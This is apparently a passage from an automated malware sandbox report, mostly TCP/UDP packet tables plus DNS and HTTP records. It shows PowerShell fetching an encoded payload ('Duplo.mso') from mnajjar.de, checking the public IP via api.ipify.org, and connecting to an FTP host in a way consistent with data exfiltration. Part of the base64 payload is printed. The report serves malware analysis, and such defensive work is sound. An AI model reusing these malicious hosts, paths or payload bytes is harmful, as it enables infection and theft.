                                              Apr 23, 2024 08:04:46.410075903 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410078049 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410078049 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410114050 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410140991 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410151005 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410152912 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410187006 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410191059 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410223961 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410254002 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410259962 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410295010 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410330057 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410366058 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410404921 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410404921 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410404921 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410438061 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410475016 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410510063 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410521984 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410547972 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410583019 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410607100 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410607100 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410619020 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410655022 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410689116 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410706043 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410706043 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410706043 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410725117 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410758972 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410793066 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410794973 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410830975 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410866022 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410866022 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410866022 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410866022 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410901070 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.410917997 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.410937071 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411037922 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411082983 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411082983 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411082983 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411137104 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411206007 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411272049 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411278009 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411278009 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411346912 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411370039 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411437988 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411534071 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411580086 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411580086 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411580086 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411602020 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411673069 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411700964 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411768913 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411804914 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411840916 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411847115 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411847115 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411847115 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411907911 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.411927938 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.411943913 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412030935 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412066936 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412076950 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412076950 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412076950 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412121058 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412127018 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412164927 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412272930 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412272930 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412326097 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412360907 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412379026 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412427902 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412457943 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412493944 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412513018 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412528992 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412535906 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412568092 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412601948 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412637949 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412647009 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412647009 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412647009 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412674904 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412713051 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.412743092 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412743092 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.412795067 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.556720018 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.556786060 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.556823969 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.556869030 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557017088 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557040930 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557070971 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557080984 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557105064 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557120085 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557163000 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557169914 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557178020 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557213068 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557231903 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557312012 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557353020 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557398081 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557398081 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557809114 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557847977 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.557908058 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.557908058 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558336020 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558373928 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558409929 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558409929 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558511972 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558551073 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558587074 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558590889 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558590889 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558624029 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558660984 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558662891 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558662891 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558697939 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558720112 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558738947 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558749914 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558784962 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558800936 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558829069 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558855057 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558891058 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558904886 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.558928013 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558963060 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.558999062 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559036016 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559041977 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559041977 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559058905 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559058905 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559071064 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559092045 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559124947 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559127092 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559170008 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559170008 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559176922 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559225082 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559233904 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559262037 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559297085 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559298992 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559298992 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559334993 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559370995 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559381008 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559381008 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559406996 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:46.559429884 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.559483051 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:04:46.940537930 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:46.940584898 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:46.940635920 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:46.953207016 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:46.953218937 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.139715910 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.139790058 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:47.141858101 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:47.141868114 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.142098904 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.191262007 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:47.196667910 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:47.244117022 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.417454004 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.417617083 CEST44349739104.26.12.205192.168.2.4
                                              Apr 23, 2024 08:04:47.417673111 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:47.420932055 CEST49739443192.168.2.4104.26.12.205
                                              Apr 23, 2024 08:04:48.768767118 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:48.878443003 CEST2149740192.185.13.234192.168.2.4
                                              Apr 23, 2024 08:04:48.878520012 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:48.880392075 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:48.989525080 CEST2149740192.185.13.234192.168.2.4
                                              Apr 23, 2024 08:04:48.989589930 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:48.990019083 CEST2149740192.185.13.234192.168.2.4
                                              Apr 23, 2024 08:04:48.990060091 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:48.990935087 CEST2149740192.185.13.234192.168.2.4
                                              Apr 23, 2024 08:04:48.990968943 CEST4974021192.168.2.4192.185.13.234
                                              Apr 23, 2024 08:04:57.008941889 CEST8049738148.163.99.20192.168.2.4
                                              Apr 23, 2024 08:04:57.009021997 CEST4973880192.168.2.4148.163.99.20
                                              Apr 23, 2024 08:05:04.749511003 CEST4973180192.168.2.4148.163.99.20

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 23, 2024 08:03:46.725349903 CEST5986553192.168.2.41.1.1.1
                                              Apr 23, 2024 08:03:46.813270092 CEST53598651.1.1.1192.168.2.4
                                              Apr 23, 2024 08:03:50.127636909 CEST5744653192.168.2.41.1.1.1
                                              Apr 23, 2024 08:03:50.607480049 CEST53574461.1.1.1192.168.2.4
                                              Apr 23, 2024 08:04:46.848671913 CEST6498253192.168.2.41.1.1.1
                                              Apr 23, 2024 08:04:46.936290979 CEST53649821.1.1.1192.168.2.4
                                              Apr 23, 2024 08:04:48.588751078 CEST6408953192.168.2.41.1.1.1
                                              Apr 23, 2024 08:04:48.767262936 CEST53640891.1.1.1192.168.2.4

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Apr 23, 2024 08:03:46.885162115 CEST192.168.2.4172.217.165.1424d5aEcho
                                              Apr 23, 2024 08:03:46.973181963 CEST172.217.165.142192.168.2.4555aEcho Reply

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Apr 23, 2024 08:03:46.725349903 CEST192.168.2.41.1.1.10xa8d8Standard query (0)google.comA (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:03:50.127636909 CEST192.168.2.41.1.1.10xf346Standard query (0)mnajjar.deA (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:46.848671913 CEST192.168.2.41.1.1.10xf2cdStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:48.588751078 CEST192.168.2.41.1.1.10xf890Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Apr 23, 2024 08:03:46.813270092 CEST1.1.1.1192.168.2.40xa8d8No error (0)google.com172.217.165.142A (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:03:50.607480049 CEST1.1.1.1192.168.2.40xf346No error (0)mnajjar.de148.163.99.20A (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:46.936290979 CEST1.1.1.1192.168.2.40xf2cdNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:46.936290979 CEST1.1.1.1192.168.2.40xf2cdNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:46.936290979 CEST1.1.1.1192.168.2.40xf2cdNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Apr 23, 2024 08:04:48.767262936 CEST1.1.1.1192.168.2.40xf890No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                              Apr 23, 2024 08:04:48.767262936 CEST1.1.1.1192.168.2.40xf890No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • mnajjar.de

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449731148.163.99.20804296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 23, 2024 08:03:50.761883020 CEST168OUTGET /vsp1/Duplo.mso HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: mnajjar.de
                                              Connection: Keep-Alive
                                              Apr 23, 2024 08:03:50.909863949 CEST244INHTTP/1.1 200 OK
                                              Connection: Keep-Alive
                                              Keep-Alive: timeout=5, max=100
                                              content-type: application/octet-stream
                                              last-modified: Mon, 22 Apr 2024 02:37:47 GMT
                                              accept-ranges: bytes
                                              content-length: 443804
                                              date: Tue, 23 Apr 2024 06:03:50 GMT
                                              Apr 23, 2024 08:03:50.909949064 CEST1289INData Raw: 36 77 4b 37 4d 4f 73 43 6c 5a 43 37 36 6a 38 4d 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 54 72 41 74 6c 2f 63 51 47 62 75 52 75 70 30 73 46 78 41 5a 74 78 41 5a 75 42 38 5a 30 53 35 5a 72 72 41 73 5a 6c 36 77 4a 4c 45 6f 48 70 68 72 73 33 57 2b
                                              Data Ascii: 6wK7MOsClZC76j8MAHEBm3EBmwNcJATrAtl/cQGbuRup0sFxAZtxAZuB8Z0S5ZrrAsZl6wJLEoHphrs3W+sCj5TrAo6/6wLIpOsCsci6TfrABusCqJLrAnue6wJQKOsCqAUxynEBm3EBm4kUC+sCtNrrAg5E0eJxAZvrAg74g8EE6wJBXXEBm4H51oLqBHzKcQGbcQGbi0QkBOsCnRvrAuiNicNxAZvrAu7lgcNg9XAAcQGbcQG
                                              Apr 23, 2024 08:03:50.909996033 CEST1289INData Raw: 73 76 50 74 4c 5a 4b 32 7a 31 4f 46 64 58 57 53 2f 74 63 65 51 72 4c 45 69 42 49 73 56 46 44 47 48 59 38 63 2f 75 46 5a 31 68 69 39 5a 68 68 74 43 6b 45 71 53 5a 4c 37 4a 77 37 5a 32 64 59 59 72 64 57 62 42 4e 79 30 66 33 56 46 2b 67 56 39 38 6f
                                              Data Ascii: svPtLZK2z1OFdXWS/tceQrLEiBIsVFDGHY8c/uFZ1hi9ZhhtCkEqSZL7Jw7Z2dYYrdWbBNy0f3VF+gV98okFX5PB0PvYMUB9RZxwG++8hRLTt7UiAkM0AsVNBACwwAkZl9wIsqJVSVVmK4+ujJzhFFm+J4n0jkEj1HtIH99LeM4rylgJJfpafKj3Q1u09uhuPbcPqkNx9ED0AUt7EvslAMz2hl+T+ORXNnsFSbGWfd/T+ycuMot
                                              Apr 23, 2024 08:03:50.910092115 CEST1289INData Raw: 6a 4f 50 30 6a 63 2b 69 72 6d 61 43 4a 4b 6f 66 5a 62 55 58 74 79 37 76 6a 59 57 4b 41 69 7a 77 4e 66 65 30 77 70 4b 32 2f 43 65 69 44 45 63 61 74 2f 54 2b 78 43 77 55 2b 59 4a 73 72 4f 41 7a 54 33 4f 6a 79 55 6b 57 4f 35 33 6f 48 4f 4b 77 48 49
                                              Data Ascii: jOP0jc+irmaCJKofZbUXty7vjYWKAizwNfe0wpK2/CeiDEcat/T+xCwU+YJsrOAzT3OjyUkWO53oHOKwHIQvCcQQQeL1IQVm2mlikMrZUCZoBzNzKn/WAu9lYlkBAzJ3RVEAS1/U3snPNa7hV+9iBVJ4Nt5F7awFGyM1VKRmeVT+sc9Dgu3yJLWHuzt+WVXsdutKXQEKNq+IDOHczpoOeUl3uuj/0eZ5hrTewVsrBuqUe+yqbWD
                                              Apr 23, 2024 08:03:50.910195112 CEST1289INData Raw: 73 46 58 35 50 37 42 56 2b 54 2b 77 56 66 6b 2f 73 46 61 71 72 67 74 72 64 34 36 50 52 54 52 72 44 63 6e 45 35 6d 5a 4d 39 42 61 4a 49 54 6c 38 54 52 49 72 43 68 4c 35 6c 31 32 68 39 49 63 54 61 55 50 39 6a 79 4a 58 62 6d 59 79 55 53 6d 75 33 4c
                                              Data Ascii: sFX5P7BV+T+wVfk/sFaqrgtrd46PRTRrDcnE5mZM9BaJITl8TRIrChL5l12h9IcTaUP9jyJXbmYyUSmu3LlQRvq+f8iMs/73tvCoMbefH9e1Q/43eKhiPZQ9huh5StOO59UyWe7jLSGwXLl8GwEAGfrOm0l3Yg+QP6CdZXa2b8bswefwXuCTO2DHokZmvskxcP4YNJxELz3wr113xBp0tLtVUqY5Zpgmr9t8n+kq0t72s2Kg7Yv
                                              Apr 23, 2024 08:03:50.910243988 CEST1289INData Raw: 62 78 2b 44 70 4e 6b 73 61 6b 64 67 43 57 66 59 69 70 6a 2f 6f 50 63 69 6f 62 43 7a 4f 43 4f 35 62 47 49 6c 31 4b 4d 39 44 64 72 69 4f 44 4e 4a 67 4c 71 49 68 32 2f 63 4d 58 4c 69 39 39 6f 74 68 4c 4e 39 59 77 79 68 4b 79 37 33 38 74 4b 42 70 64
                                              Data Ascii: bx+DpNksakdgCWfYipj/oPciobCzOCO5bGIl1KM9DdriODNJgLqIh2/cMXLi99othLN9YwyhKy738tKBpdnQGaDQIGCiorNTLMNLDsbcYOraY3YhV0KaPmFXe6h6Q31x4TdgGy0pcb7ckBg+F20hWl/TmvHO2DEThhjLKPFPhDUYbdNujtoF/4mv/QPXZSui5HiwWkaiWB1yDZXy5BtPP22/231ym1pwf/pWCpMbr0UPZZQN9hm
                                              Apr 23, 2024 08:03:50.910275936 CEST1289INData Raw: 38 47 64 76 36 34 44 74 33 7a 79 2f 34 79 6e 2b 57 75 31 62 64 5a 47 55 37 55 4c 4b 64 4e 6c 38 6e 64 51 63 53 79 77 4e 66 75 33 68 79 4c 50 5a 77 71 74 53 2b 75 64 49 6e 4f 48 68 50 52 59 41 6d 70 61 4d 37 63 39 52 74 56 4d 38 4a 55 75 41 4a 77
                                              Data Ascii: 8Gdv64Dt3zy/4yn+Wu1bdZGU7ULKdNl8ndQcSywNfu3hyLPZwqtS+udInOHhPRYAmpaM7c9RtVM8JUuAJwl+8jmyzRK+pe3LLjEabl/T+wa+5DsFX6D7jQqLlZiEfXQQb/omAHSnhY74NI1H+dNvg0TrPo+f8td/U4O6BUo8Z21RP1t4yfgq5T/iTTk/IO7ifeo5SLjdjtnc3qIhlV8OnaNVdjEzI7FfMPKGOCoxVnPb6mmrt07
                                              Apr 23, 2024 08:03:50.910339117 CEST1289INData Raw: 71 61 56 57 7a 53 43 53 31 68 4f 38 39 62 31 45 71 61 56 57 7a 53 43 53 31 68 74 4e 6e 4d 2f 66 33 4e 46 4f 6e 50 64 37 45 41 76 69 30 2f 43 4a 6b 38 4c 66 36 6b 58 61 4d 59 75 4a 6e 74 59 2f 59 4f 72 74 38 7a 75 6d 5a 71 42 42 72 33 67 32 47 35
                                              Data Ascii: qaVWzSCS1hO89b1EqaVWzSCS1htNnM/f3NFOnPd7EAvi0/CJk8Lf6kXaMYuJntY/YOrt8zumZqBBr3g2G5ZfT6AKegF6OCGIqQsbb6stiSJJNW1+C3EHu5jMOQktdHNHSePgpb6TR0+/L7ENu2KPHN5SJSbdOi5zs2/4nvfbXxu4n3qO0i4ylpxARSElA/M4fysNbKGyk47pOUEnYUNJPgEL/V8WrafbP8YaATRfORfuO70rMp7
                                              Apr 23, 2024 08:03:50.910393953 CEST1289INData Raw: 54 33 76 6c 54 32 6f 79 46 6f 6d 49 57 70 32 39 57 76 59 6e 33 72 75 30 55 34 38 6f 62 61 31 6e 4f 79 34 56 65 62 70 38 44 69 6c 32 37 51 6c 62 4c 72 47 38 45 43 6b 65 5a 72 33 5a 30 4b 61 65 49 6b 55 35 4c 56 67 44 55 70 73 7a 41 67 47 61 32 37
                                              Data Ascii: T3vlT2oyFomIWp29WvYn3ru0U48oba1nOy4Vebp8Dil27QlbLrG8ECkeZr3Z0KaeIkU5LVgDUpszAgGa271t5KRvSLki1kKcXE6A+TuwVcU79pX5P7BV+T+wVfk/sFX5P7BV+r3wKkau12exI/pxjWQVezI3CEnJsGh8zp9F1rW9kYJhDvi1xtjkBSdploBfFxP3SN+gVKPFIaYTXbePdghT3/6GwVKAhbfu6efE0/6ELInmlv4
                                              Apr 23, 2024 08:03:50.910437107 CEST1289INData Raw: 57 6c 72 64 44 4d 50 4f 32 44 45 31 65 30 4c 34 4c 68 78 58 72 51 38 73 4f 4a 53 4e 34 6d 2b 38 68 4d 34 76 73 43 78 36 50 5a 78 6c 57 45 33 32 61 68 35 34 70 68 52 57 67 63 4b 66 64 74 39 53 4f 7a 76 65 38 62 48 62 59 56 47 58 50 78 7a 2b 6b 67
